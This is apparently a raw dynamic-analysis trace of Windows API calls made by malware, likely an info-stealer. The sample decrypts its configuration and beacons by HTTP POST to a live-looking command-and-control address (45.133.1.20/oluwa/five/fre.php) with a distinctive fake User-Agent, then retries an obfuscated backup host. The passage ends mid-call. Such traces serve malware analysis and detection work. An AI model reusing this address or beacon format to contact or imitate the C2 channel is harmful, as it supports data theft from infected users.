CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0209.153] GetProcessHeap () returned 0x6a0000 [0209.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0209.154] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.155] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0209.155] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.156] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0209.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.157] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0209.157] GetProcessHeap () returned 0x6a0000 [0209.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0209.159] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.162] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0209.162] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.163] CryptDestroyKey (hKey=0x6ad060) returned 1 [0209.164] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.164] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0209.164] GetProcessHeap () returned 0x6a0000 [0209.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0209.165] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.165] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0209.166] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.167] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0209.167] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.168] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0209.169] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.169] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0209.169] GetProcessHeap () returned 0x6a0000 [0209.169] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0209.169] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0209.169] GetProcessHeap () returned 0x6a0000 [0209.169] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab10 [0209.169] socket (af=2, type=1, protocol=6) returned 0x5a4 [0209.170] connect (s=0x5a4, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0209.195] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0209.196] GetProcessHeap () returned 0x6a0000 [0209.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0209.196] GetProcessHeap () returned 0x6a0000 [0209.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c7f00 [0209.196] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0209.197] wvsprintfA (in: param_1=0x6c7f00, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0209.197] GetProcessHeap () returned 0x6a0000 [0209.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c9f28 [0209.198] GetProcessHeap () returned 0x6a0000 [0209.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0209.198] GetProcessHeap () returned 0x6a0000 [0209.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0209.198] GetProcessHeap () returned 0x6a0000 [0209.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c7f00 [0209.199] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0209.200] wvsprintfA (in: param_1=0x6c7f00, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0209.200] GetProcessHeap () returned 0x6a0000 [0209.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0209.200] GetProcessHeap () returned 0x6a0000 [0209.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0209.201] send (s=0x5a4, buf=0x6bd460*, len=242, flags=0) returned 242 [0209.202] send (s=0x5a4, buf=0x6bb998*, len=159, flags=0) returned 159 [0209.202] GetProcessHeap () returned 0x6a0000 [0209.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0209.202] recv (in: s=0x5a4, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0209.281] GetProcessHeap () returned 0x6a0000 [0209.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0209.281] GetProcessHeap () returned 0x6a0000 [0209.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0209.283] GetProcessHeap () returned 0x6a0000 [0209.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c9f28 | out: hHeap=0x6a0000) returned 1 [0209.283] GetProcessHeap () returned 0x6a0000 [0209.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0209.284] closesocket (s=0x5a4) returned 0 [0209.284] GetProcessHeap () returned 0x6a0000 [0209.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab10 | out: hHeap=0x6a0000) returned 1 [0209.284] GetProcessHeap () returned 0x6a0000 [0209.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0209.285] GetProcessHeap () returned 0x6a0000 [0209.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0209.285] GetProcessHeap () returned 0x6a0000 [0209.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0209.286] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xb04) returned 0x5a4 [0209.288] Sleep (dwMilliseconds=0xea60) [0209.289] GetProcessHeap () returned 0x6a0000 [0209.289] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0209.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.290] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0209.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.297] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0209.308] GetProcessHeap () returned 0x6a0000 [0209.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c7b48 [0209.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.314] CryptImportKey (in: hProv=0x6bef48, pbData=0x6c7b48, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0209.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.315] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0209.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.316] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0209.316] GetProcessHeap () returned 0x6a0000 [0209.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7b48 | out: hHeap=0x6a0000) returned 1 [0209.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.318] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0209.319] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.319] CryptDestroyKey (hKey=0x6ad020) returned 1 [0209.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.323] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0209.323] GetProcessHeap () returned 0x6a0000 [0209.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0209.324] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.325] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0209.330] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.330] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0209.331] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.331] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0209.332] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.333] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0209.333] GetProcessHeap () returned 0x6a0000 [0209.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0209.333] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0209.333] GetProcessHeap () returned 0x6a0000 [0209.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0209.334] GetProcessHeap () returned 0x6a0000 [0209.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0209.334] GetProcessHeap () returned 0x6a0000 [0209.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0209.335] GetProcessHeap () returned 0x6a0000 [0209.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0209.336] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.336] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0209.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.360] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0209.369] GetProcessHeap () returned 0x6a0000 [0209.369] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0209.369] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.370] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0209.371] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.371] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0209.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.373] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0209.373] GetProcessHeap () returned 0x6a0000 [0209.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0209.374] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.375] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0209.375] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.378] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0209.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.379] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0209.379] GetProcessHeap () returned 0x6a0000 [0209.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0209.380] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.381] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0209.382] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.382] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0209.383] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.383] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0209.384] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.385] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0209.385] GetProcessHeap () returned 0x6a0000 [0209.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0209.385] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0209.385] GetProcessHeap () returned 0x6a0000 [0209.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9d0 [0209.385] socket (af=2, type=1, protocol=6) returned 0x5a8 [0209.388] connect (s=0x5a8, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0209.413] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0209.414] GetProcessHeap () returned 0x6a0000 [0209.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0209.414] GetProcessHeap () returned 0x6a0000 [0209.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c7f00 [0209.415] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0209.416] wvsprintfA (in: param_1=0x6c7f00, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0209.416] GetProcessHeap () returned 0x6a0000 [0209.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c9f28 [0209.416] GetProcessHeap () returned 0x6a0000 [0209.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0209.417] GetProcessHeap () returned 0x6a0000 [0209.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0209.417] GetProcessHeap () returned 0x6a0000 [0209.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c7f00 [0209.418] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0209.420] wvsprintfA (in: param_1=0x6c7f00, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0209.420] GetProcessHeap () returned 0x6a0000 [0209.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0209.420] GetProcessHeap () returned 0x6a0000 [0209.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0209.421] send (s=0x5a8, buf=0x6bd460*, len=242, flags=0) returned 242 [0209.421] send (s=0x5a8, buf=0x6bb998*, len=159, flags=0) returned 159 [0209.421] GetProcessHeap () returned 0x6a0000 [0209.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0209.421] recv (in: s=0x5a8, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0209.489] GetProcessHeap () returned 0x6a0000 [0209.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0209.490] GetProcessHeap () returned 0x6a0000 [0209.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0209.491] GetProcessHeap () returned 0x6a0000 [0209.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c9f28 | out: hHeap=0x6a0000) returned 1 [0209.492] GetProcessHeap () returned 0x6a0000 [0209.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0209.492] closesocket (s=0x5a8) returned 0 [0209.494] GetProcessHeap () returned 0x6a0000 [0209.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9d0 | out: hHeap=0x6a0000) returned 1 [0209.494] GetProcessHeap () returned 0x6a0000 [0209.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0209.494] GetProcessHeap () returned 0x6a0000 [0209.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0209.495] GetProcessHeap () returned 0x6a0000 [0209.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0209.496] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x578) returned 0x5a8 [0209.498] Sleep (dwMilliseconds=0xea60) [0209.499] GetProcessHeap () returned 0x6a0000 [0209.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0209.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.501] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0209.508] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.509] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0209.520] GetProcessHeap () returned 0x6a0000 [0209.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0209.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.522] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0209.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.526] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0209.527] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.527] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0209.527] GetProcessHeap () returned 0x6a0000 [0209.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0209.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.529] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0209.530] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.530] CryptDestroyKey (hKey=0x6ad020) returned 1 [0209.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.531] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0209.531] GetProcessHeap () returned 0x6a0000 [0209.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0209.532] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.533] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0209.533] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.534] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0209.535] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.535] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0209.536] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.536] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0209.536] GetProcessHeap () returned 0x6a0000 [0209.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0209.537] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0209.537] GetProcessHeap () returned 0x6a0000 [0209.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0209.537] GetProcessHeap () returned 0x6a0000 [0209.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0209.538] GetProcessHeap () returned 0x6a0000 [0209.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0209.538] GetProcessHeap () returned 0x6a0000 [0209.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0209.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.540] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0209.549] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.549] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0209.560] GetProcessHeap () returned 0x6a0000 [0209.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0209.561] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.564] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0209.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.565] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0209.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.566] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, 